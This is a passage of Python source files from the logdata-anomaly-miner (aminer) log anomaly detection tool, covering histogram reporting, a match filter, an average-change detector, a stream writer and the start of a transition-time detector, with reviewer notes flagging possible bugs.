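    def __init__(self, aminer_config, target_path, bin_definition, report_interval, anomaly_event_handlers, reset_after_report_flag=True,
                 output_logline=True, log_resource_ignore_list=None):
        """Initialize the analysis component.

        @param aminer_config configuration from analysis_context.
        @param target_path the path to be analyzed in the parser match of the log atom.
        @param bin_definition the bin definition (LinearNumericBinDefinition, ModuloTimeBinDefinition) to be used.
        @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the
        system time. Hence, reports can be delayed when no data is received.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param reset_after_report_flag reset the histogram data after reporting.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param log_resource_ignore_list resource names whose atoms are skipped entirely.
        @raise TypeError when bin_definition is not a BinDefinition.
        """
        # avoid "defined outside init" issue
        self.log_success, self.log_total = [None]*2
        super().__init__(
            aminer_config=aminer_config, target_path=target_path, report_interval=report_interval,
            anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, output_logline=output_logline,
            log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]
        )
        if not isinstance(bin_definition, BinDefinition):
            msg = "bin_definition has to be of type BinDefinition."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.last_report_time = None
        self.next_report_time = 0.0
        self.bin_definition = bin_definition
        # Maps every match path to a shared record [set of paths in the group, HistogramData, last parser match].
        self.histogram_data = {}

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        Atoms without the target path are ignored. Otherwise the atom's path set is matched against the existing
        path groups: a group whose paths all occur in the atom just receives the value, a group only partly covered
        is split (the covered part gets a clone of the histogram), and paths seen for the first time form a new group.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        match = match_dict.get(self.target_path, None)
        if match is None:
            return
        match_value = match.match_object

        all_path_set = set(match_dict.keys())
        unmapped_path = []
        missing_paths = set()
        while all_path_set:
            path = all_path_set.pop()
            histogram_mapping = self.histogram_data.get(path)
            if histogram_mapping is None:
                unmapped_path.append(path)
                continue
            # So the path is already mapped to one histogram. See if all paths to the given histogram are still in all_path_set. If not,
            # a split within the mapping is needed.
            clone_set = all_path_set.copy()
            mapped_path = None
            for mapped_path in histogram_mapping[0]:
                try:
                    clone_set.remove(mapped_path)
                except KeyError:
                    if mapped_path != path:
                        missing_paths.add(mapped_path)
            # NOTE(review): after the loop mapped_path is the last path of the group, which may be one of the missing
            # paths in the split branch below; match_dict.get() then yields None. Kept as found - verify against the tests.
            if not missing_paths:
                # Everything OK, just add the value to the mapping.
                match = match_dict.get(mapped_path, None)
                match_value = match.match_object
                if isinstance(match.match_object, bytes):
                    # Decoded in place on the shared parser match, so later handlers see a str here.
                    match.match_object = match.match_object.decode(AminerConfig.ENCODING)
                histogram_mapping[1].target_path = mapped_path
                histogram_mapping[1].add_value(match_value)
                histogram_mapping[2] = log_atom.parser_match
            else:
                # We need to split the current set here. Keep the current statistics for all the missingPaths but clone the data for the
                # remaining paths.
                new_histogram = histogram_mapping[1].clone()
                match = match_dict.get(mapped_path, None)
                match_value = match.match_object
                histogram_mapping[1].target_path = mapped_path
                new_histogram.add_value(match_value)
                new_path_set = histogram_mapping[0] - missing_paths
                new_histogram_mapping = [new_path_set, new_histogram, log_atom.parser_match]
                for mapped_path in new_path_set:
                    self.histogram_data[mapped_path] = new_histogram_mapping
                histogram_mapping[0] = missing_paths
                missing_paths = set()

        if unmapped_path:
            histogram = HistogramData(self.target_path, self.bin_definition)
            histogram.add_value(match_value)
            new_record = [set(unmapped_path), histogram, log_atom.parser_match]
            for path in unmapped_path:
                new_record[1].property_path = path
                self.histogram_data[path] = new_record

        timestamp = log_atom.get_timestamp()
        if self.next_report_time < timestamp:
            if self.last_report_time is None:
                self.last_report_time = timestamp
                self.next_report_time = timestamp + self.report_interval
            else:
                self.send_report(log_atom, timestamp)
        self.log_success += 1

    def send_report(self, log_atom, timestamp):
        """Send report to event handlers.

        @param log_atom the atom that triggered the report; passed through to the handlers.
        @param timestamp end of the reporting period (the atom's timestamp).
        One event is sent carrying all path groups; with reset_after_report_flag every group's histogram is reset
        afterwards (formerly only the group visited last was reset, so the others kept accumulating across reports).
        """
        report_str = "Path histogram report "
        if self.last_report_time is not None:
            report_str += f"from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} "
        report_str += f"till {datetime.fromtimestamp(timestamp).strftime(date_string)}"
        all_path_set = set(self.histogram_data.keys())
        analysis_component = {"AffectedLogAtomPaths": list(all_path_set)}
        res = []
        h = []
        while all_path_set:
            d = {}
            path = all_path_set.pop()
            histogram_mapping = self.histogram_data.get(path)
            data_item = histogram_mapping[1]
            bins = {}
            i = 0
            while i < len(data_item.bin_names):
                bins[data_item.bin_names[i]] = data_item.bin_data[i]
                i = i + 1
            d["TotalElements"] = data_item.total_elements
            d["BinnedElements"] = data_item.binned_elements
            d["HasOutlierBinsFlag"] = data_item.has_outlier_bins_flag
            d["Bins"] = bins
            if self.output_logline:
                bin_definition = {
                    "Type": str(data_item.bin_definition.__class__.__name__), "LowerLimit": data_item.bin_definition.lower_limit,
                    "BinSize": data_item.bin_definition.bin_size, "BinCount": data_item.bin_definition.bin_count,
                    "OutlierBinsFlag": data_item.bin_definition.outlier_bins_flag, "BinNames": data_item.bin_definition.bin_names,
                    "ExpectedBinRatio": data_item.bin_definition.expected_bin_ratio}
                if isinstance(data_item.bin_definition, ModuloTimeBinDefinition):
                    bin_definition["ModuloValue"] = data_item.bin_definition.modulo_value
                    bin_definition["TimeUnit"] = data_item.bin_definition.time_unit
                d["BinDefinition"] = bin_definition
            # target_path is only set on a histogram by receive_atom once its group was matched again; a freshly created
            # or cloned histogram does not have it yet (HistogramData.__init__ and clone() do not set it), so fall back
            # to property_path instead of failing with an AttributeError.
            d["PropertyPath"] = getattr(data_item, "target_path", data_item.property_path)
            report_str += os.linesep + 'Path values "%s":' % '", "'.join(histogram_mapping[0])
            if isinstance(histogram_mapping[2].match_element.match_string, bytes):
                # Decoded in place on the stored parser match.
                histogram_mapping[2].match_element.match_string = histogram_mapping[2].match_element.match_string.decode(
                    AminerConfig.ENCODING)
            report_str += os.linesep + f"Example: {histogram_mapping[2].match_element.match_string}"
            if len(res) < histogram_mapping[1].total_elements:
                res = [""] * histogram_mapping[1].total_elements
            for line in histogram_mapping[1].to_string(" ").split("\n"):
                report_str += os.linesep + f"{line}"
            if len(res) > 0:
                res[0] = report_str
            all_path_set.discard(path)
            h.append(d)
        # NOTE(review): MissingPaths reflects only the group visited last, as in the original code.
        analysis_component["MissingPaths"] = list(histogram_mapping[0])
        analysis_component["HistogramData"] = h
        analysis_component["ReportInterval"] = self.report_interval
        analysis_component["ResetAfterReportFlag"] = self.reset_after_report_flag
        event_data = {"AnalysisComponent": analysis_component}
        if self.reset_after_report_flag:
            # The event payload holds copies of the counts, so resetting before delivery does not change the report.
            for mapping in self.histogram_data.values():
                mapping[1].reset()
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", "Histogram report", res, event_data, log_atom, self)
        self.last_report_time = timestamp
        self.next_report_time = timestamp + self.report_interval
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__)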
# File: logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MatchFilter.py
"""This module defines a filter for parsed paths and values.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging

from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AminerConfig import DEBUG_LOG_NAME


class MatchFilter(AtomHandlerInterface):
    """Raise a "Log Atom Filtered" event for every log atom that carries one of the configured parser paths.

    When target_value_list is given, an event is only raised if every value found under the path is contained in that list.
    """

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, target_value_list=None, output_logline=True,
                 log_resource_ignore_list=None):
        """Initialize the filter.

        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths whose presence in a log atom triggers an event. Must not be empty.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_value_list if not None, only report a log atom if all match values found under the path are contained in
               this list.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param log_resource_ignore_list resource names whose log atoms are skipped entirely; None is replaced by an empty list
               by the base class (mutable_default_args).
        @raises ValueError if target_path_list is empty.
        """
        # Declared here so the attributes are not reported as "defined outside __init__"; the base class fills them in.
        self.next_persist_time = None
        self.log_success = None
        self.log_total = None
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            target_value_list=target_value_list, output_logline=output_logline, log_resource_ignore_list=log_resource_ignore_list,
            mutable_default_args=["log_resource_ignore_list"]
        )
        # The argument as passed by the caller is validated, not the attribute derived from it by the base class.
        if len(target_path_list) == 0:
            msg = "target_path_list must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

    @staticmethod
    def _match_value(match_element):
        """Return the match object of one match element, decoding bytes with the configured encoding."""
        match_object = match_element.match_object
        if isinstance(match_object, bytes):
            return match_object.decode(AminerConfig.ENCODING)
        return match_object

    def receive_atom(self, log_atom):
        """Forward all log atoms that involve a target path and, when target_value_list is set, only the listed values.

        @param log_atom the parsed log atom to inspect.
        """
        if any(log_atom.source.resource_name.decode() == ignored for ignored in self.log_resource_ignore_list):
            return
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        for target_path in self.target_path_list:
            match = match_dict.get(target_path)
            if match is None:
                continue
            # A path maps either to a single match element or to a list of them (repeated elements).
            matches = match if isinstance(match, list) else [match]
            affected_log_atom_values = [self._match_value(element) for element in matches]
            if self.target_value_list and any(value not in self.target_value_list for value in affected_log_atom_values):
                continue
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                # Undecodable raw data is reported in escaped repr form instead of being dropped.
                data = repr(log_atom.raw_data)
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            event_data = {"AnalysisComponent": {
                "AffectedLogAtomPaths": [target_path], "AffectedLogAtomValues": [str(affected_log_atom_values)]}}
            sorted_log_lines = [original_log_line_prefix + data]
            for listener in self.anomaly_event_handlers:
                listener.receive_event(
                    f"Analysis.{self.__class__.__name__}", "Log Atom Filtered", sorted_log_lines, event_data, log_atom, self)
            self.log_success += 1
# File: logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MatchValueAverageChangeDetector.py
"""This module defines a detector that reports diverges from an average.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import os
import logging

from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class MatchValueAverageChangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface):
    """This detector calculates the average of a given list of values to monitor.

    Reports are generated if the average of the latest bin diverges significantly from the values observed before.
    Per target path the statistics are kept in a list of the form
    [first_timestamp, k_value, old_bin (n, sum, sum2, avg, variance) or None, current_bin (n, sum, sum2)],
    where sums are taken of (value - k_value) to keep the numbers small (see update and analyze).
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, timestamp_path, target_path_list, min_bin_elements, min_bin_time,
                 debug_mode=False, persistence_id="Default", output_logline=True, learn_mode=False, avg_factor=1, var_factor=2,
                 stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param timestamp_path if not None, use this path value for timestamp based bins.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation. Must not be empty or None.
        @param learn_mode specifies whether new statistics should be learned.
        @param min_bin_elements evaluate the latest bin only after at least that number of elements was added to it.
        @param min_bin_time evaluate the latest bin only when the first element is received after min_bin_time has elapsed.
        @param avg_factor the maximum allowed deviation for the average value before an anomaly is raised.
        @param var_factor the maximum allowed deviation for the variance of the value before an anomaly is raised.
        @param debug_mode if true, generate an analysis report even when average of last bin was within expected range.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after this amount of time, counted from the first log atom.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose log atoms are skipped entirely.
        @raises ValueError if target_path_list is empty or None.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, timestamp_path=timestamp_path,
            target_path_list=target_path_list, min_bin_elements=min_bin_elements, min_bin_time=min_bin_time, debug_mode=debug_mode,
            persistence_id=persistence_id, output_logline=output_logline, avg_factor=avg_factor, var_factor=var_factor,
            learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time,
            log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]
        )
        if not self.target_path_list:
            msg = "target_path_list must not be empty or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        # List of (path, stat_data) pairs, one per target path; filled by load_persistence_data.
        self.stat_data = []
        self.load_persistence_data()

    def receive_atom(self, log_atom):
        """Update the per-path statistics with this log atom and send a summary to all event handlers once every bin is ready.

        @param log_atom the parsed log atom; its atom_time drives the stop-learning timers and, unless timestamp_path is set,
               get_timestamp() is used as the bin timestamp.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return
        self.log_total += 1
        parser_match = log_atom.parser_match
        value_dict = parser_match.get_match_dictionary()
        # The stop-learning deadlines are relative to the first log atom seen, so they are resolved lazily here.
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        timestamp_value = log_atom.get_timestamp()
        if self.timestamp_path is not None:
            match_value = value_dict.get(self.timestamp_path)
            if match_value is None:
                return
            timestamp_value = match_value.match_object
            # NOTE(review): this event_data is overwritten below before any event is sent, so "MatchValue" never reaches a listener.
            event_data = {"MatchValue": match_value.match_object}
        analysis_summary = ""
        ready_for_analysis_flag = True
        # Every path is updated; the analysis only runs when all bins report that they are full enough.
        for (path, stat_data) in self.stat_data:
            match = value_dict.get(path)
            if match is None:
                ready_for_analysis_flag = (self.update(stat_data, timestamp_value, None) and ready_for_analysis_flag)
            else:
                # Seeing a value for a monitored path extends the no-anomaly learning window.
                if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
                if isinstance(match, list):
                    data = []
                    for m in match:
                        data.append(m.match_object)
                else:
                    data = match.match_object
                ready_for_analysis_flag = (self.update(stat_data, timestamp_value, data) and ready_for_analysis_flag)
        if ready_for_analysis_flag:
            anomaly_scores = []
            for (path, stat_data) in self.stat_data:
                analysis_data = self.analyze(stat_data)
                if analysis_data is not None:
                    d = {"Path": path}
                    a = {}
                    # analysis_data layout: [message, new n, new avg, new var, old n, old avg, old var, ...] (see analyze).
                    new = {"N": analysis_data[1], "Avg": analysis_data[2], "Var": analysis_data[3]}
                    old = {"N": analysis_data[4], "Avg": analysis_data[5], "Var": analysis_data[6]}
                    a["New"] = new
                    a["Old"] = old
                    d["AnalysisData"] = a
                    if analysis_summary == "":
                        analysis_summary += f'"{path}": {analysis_data[0]}'
                    else:
                        analysis_summary += os.linesep
                        analysis_summary += f' "{path}": {analysis_data[0]}'
                    anomaly_scores.append(d)
            analysis_component = {"AffectedLogAtomPaths": list(value_dict), "AnomalyScores": anomaly_scores,
                                  "MinBinElements": self.min_bin_elements, "MinBinTime": self.min_bin_time, "DebugMode": self.debug_mode}
            event_data = {"AnalysisComponent": analysis_component}
            if analysis_summary:
                # NOTE(review): the line list is sized from the old-bin element count of the LAST path in self.stat_data
                # (stat_data is the loop variable left over from the loop above); only res[0] carries text.
                res = [""] * stat_data[2][0]
                res[0] = analysis_summary
                for listener in self.anomaly_event_handlers:
                    listener.receive_event(f"Analysis.{self.__class__.__name__}", "Statistical data report", res, event_data,
                                           log_atom, self)
        self.log_success += 1

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the current trigger time.
        @return the delay until the next invocation: the remaining time until next_persist_time, or the configured
                persistence period after persisting (or while next_persist_time is still None).
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def load_persistence_data(self):
        """Load the persistence data from storage.

        One (path, []) entry is created per target path first; persisted entries of the form [path, values] are then merged
        into the entry with the matching path, converting JSON lists back into tuples.
        NOTE(review): a persisted path that is not in target_path_list leaves index == len(self.stat_data) and the
        append below raises IndexError, i.e. a stale persistence file makes construction fail.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        for path in self.target_path_list:
            self.stat_data.append((path, [],))

        def replace_brackets(val):
            """Replace lists with tuples."""
            if isinstance(val, list):
                val = tuple(val)
            return val

        if persistence_data is not None:
            for val in persistence_data:
                values = replace_brackets(val[1])
                index = 0
                for p, _ in self.stat_data:
                    if p == val[0]:
                        break
                    index += 1
                for value in values:
                    value = replace_brackets(value)
                    self.stat_data[index][1].append(value)

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, self.stat_data)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def update(self, stat_data, timestamp_value, value):
        """Update the collected statistics data of one path and report whether its current bin is ready for analysis.

        @param stat_data the mutable statistics list of the path (see class docstring); filled on first use.
        @param timestamp_value the timestamp of the current log atom.
        @param value the new value, or None to only check the readiness conditions without updating.
        @return True if the bin is full enough to perform an analysis.
        """
        if value is not None:
            if not stat_data:
                # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance),
                # current-bin (n, sum, sum2)
                stat_data.append(timestamp_value)
                stat_data.append(value)
                stat_data.append(None)
                stat_data.append((1, 0.0, 0.0,))
            else:
                # Sums are accumulated relative to the first value (k-value); analyze adds it back for reporting.
                # NOTE(review): a list value (several matches for the path, see receive_atom) cannot be subtracted here - confirm
                # that target paths are expected to match a single element.
                delta = value - stat_data[1]
                bin_values = stat_data[3]
                stat_data[3] = (bin_values[0] + 1, bin_values[1] + delta, bin_values[2] + delta * delta)
        if not stat_data:
            return False
        if stat_data[3][0] < self.min_bin_elements:
            return False
        if self.timestamp_path is not None:
            # NOTE(review): stat_data[0] is set once by the first value and never advanced when analyze closes a bin, so this
            # compares against the first timestamp ever seen rather than the start of the current bin - confirm intended.
            return timestamp_value - stat_data[0] >= self.min_bin_time
        return True

    def analyze(self, stat_data):
        """Perform the analysis and progress from the last bin to the next one.

        The current bin is compared with the old bin; in learn_mode the two are merged into the new old bin.
        @param stat_data the mutable statistics list of one path (see class docstring).
        @return None when statistical data was as expected and debugging is disabled, otherwise a list whose first element is
                the report message followed by new n, avg, var and old n, avg, var (the "Initial" report pads with None).
        """
        logging.getLogger(DEBUG_LOG_NAME).debug("%s performs analysis.", self.__class__.__name__)
        current_bin = stat_data[3]
        current_average = current_bin[1] / current_bin[0]
        # Sample variance; NOTE(review): divides by n - 1, so a bin with a single element (min_bin_elements <= 1) raises
        # ZeroDivisionError here.
        current_variance = (current_bin[2] - (current_bin[1] * current_bin[1]) / current_bin[0]) / (current_bin[0] - 1)
        # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance),
        # current-bin (n, sum, sum2)
        old_bin = stat_data[2]
        if old_bin is None:
            # First completed bin becomes the reference; nothing to compare against yet.
            stat_data[2] = (current_bin[0], current_bin[1], current_bin[2], current_average, current_variance,)
            stat_data[3] = (0, 0.0, 0.0)
            if self.debug_mode:
                return [f"Initial: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}"] + [None]*10
        else:
            total_n = old_bin[0] + current_bin[0]
            total_sum = old_bin[1] + current_bin[1]
            total_sum2 = old_bin[2] + current_bin[2]
            # NOTE(review): the current bin is only reset inside learn_mode; with learn_mode off it keeps growing and is
            # re-analyzed on every further atom - confirm that this is intended.
            if self.learn_mode:
                stat_data[2] = (
                    total_n, total_sum, total_sum2, total_sum / total_n, (total_sum2 - (total_sum * total_sum) / total_n) / (total_n - 1))
                stat_data[3] = (0, 0.0, 0.0)
            # Both thresholds are scaled by the old bin's variance (old_bin[4]), not its standard deviation.
            if (current_variance > self.var_factor * old_bin[4]) or (abs(current_average - old_bin[3]) > self.avg_factor * old_bin[4]) or \
                    self.debug_mode:
                res = [f"Change: new: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}; old: n = "
                       f"{old_bin[0]}, avg = {old_bin[3] + stat_data[1]}, var = { old_bin[4]}", current_bin[0],
                       current_average + stat_data[1], current_variance, old_bin[0], old_bin[3] + stat_data[1], old_bin[4]]
                return res
        return None
# File: logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MatchValueStreamWriter.py
"""This module defines a writer that forwards match information to a stream.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
# Only used for the isinstance check against BytesIO in receive_atom (io.BytesIO is the same class in CPython).
import _io


class MatchValueStreamWriter(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """This class extracts values from a given match and writes them to a stream.

    This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for
    further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time,
    add the writer object also to the time trigger list.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, stream, target_path_list, separator, missing_value_string, log_resource_ignore_list=None):
        """Initialize the writer.

        @param stream the stream on which the match results are written. A BytesIO receives bytes, any other stream receives
               str (see receive_atom).
        @param target_path_list parser paths of values to be written, in output order; a path may occur more than once.
        @param separator bytes added between match values in the output stream.
        @param missing_value_string bytes which are added if no match was found for a path.
        @param log_resource_ignore_list resource names whose log atoms are skipped entirely.
        @raises TypeError if target_path_list is None.
        """
        # avoid "defined outside init" issue
        self.log_success, self.log_total = [None]*2
        super().__init__(stream=stream, target_path_list=target_path_list, separator=separator,
                         missing_value_string=missing_value_string, log_resource_ignore_list=log_resource_ignore_list,
                         mutable_default_args=["log_resource_ignore_list"])
        if self.target_path_list is None:
            raise TypeError("target_path_list must not be None.")

    def receive_atom(self, log_atom):
        """Forward match value information to the stream.

        One output line is written per log atom that contains at least one real match value; it holds the match strings of
        the target paths joined by separator, with missing_value_string standing in for absent paths.
        @param log_atom the parsed log atom.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        add_sep_flag = False
        contains_data = False
        result = b""
        for i, path in enumerate(self.target_path_list):
            if add_sep_flag:
                result += self.separator
            match = match_dict.get(path)
            if match is None:
                result += self.missing_value_string
            else:
                matches = []
                cnt = self.target_path_list.count(path)
                if isinstance(match, list):
                    if cnt > 1:
                        # The path is listed several times: the k-th occurrence in target_path_list takes the k-th match element.
                        index = [j for j, x in enumerate(self.target_path_list) if x == path].index(i)
                        if index < [x.path for x in match if x.path == path].count(path) and index < len(match):
                            matches.append(match[index])
                        else:
                            matches.append(None)
                    else:
                        matches += match
                elif cnt > 1 and i > self.target_path_list.index(path):
                    # Single match element but the path is repeated: only its first occurrence gets the value.
                    matches.append(None)
                else:
                    matches.append(match)
                for match in matches:
                    if match is None:
                        result += self.missing_value_string + self.separator
                    else:
                        result += match.match_string + self.separator
                        contains_data = True
                # Drop the separator appended after the last element of this path.
                if len(self.separator) > 0:
                    result = result[:-len(self.separator)]
            add_sep_flag = True
        if contains_data:
            if not isinstance(self.stream, _io.BytesIO):
                # Text streams get a lossy ASCII decode: any non-ASCII bytes of the match strings are silently dropped
                # from the forwarded line.
                self.stream.write(result.decode("ascii", "ignore"))
                self.stream.write("\n")
            else:
                self.stream.write(result)
                self.stream.write(b"\n")
        self.log_success += 1

    def do_timer(self, _trigger_time):
        """Flush the stream.

        @param _trigger_time unused.
        @return 10, the delay until the next trigger (units as defined by the time trigger interface).
        """
        self.stream.flush()
        return 10

    def do_persist(self):
        """Flush the stream; this writer keeps no other persistent state."""
        self.stream.flush()
# File: logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MinimalTransitionTimeDetector.py
"""This module defines a detector for minimal transition times between states (e.g. value combinations of stated paths).

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging

from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \
    KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class MinimalTransitionTimeDetector(
        AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """Create events when minimal transition times between states (e.g. value combinations of stated paths) are undercut.

    States are tuples of the values found under target_path_list; sequences are told apart by the values under id_path_list.
    The learned minimal times are kept in time_matrix[state_1][state_2] and periodically tightened via solidify_matrix.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list, id_path_list=None, ignore_list=None,
                 constraint_list=None, allow_missing_id=False, num_log_lines_solidify_matrix=100, time_output_threshold=0,
                 anomaly_threshold=0.05, persistence_id="Default", learn_mode=False, output_logline=True, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their
               combined occurrences. Must not be empty or None.
        @param id_path_list the list of paths where id values can be stored in all relevant log event types.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths
               are omitted. The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set).
        @param num_log_lines_solidify_matrix number of processed log lines after which the matrix is solidified. This process
               is periodically repeated.
        @param time_output_threshold threshold for the tested minimal transition time which has to be exceeded to be tested.
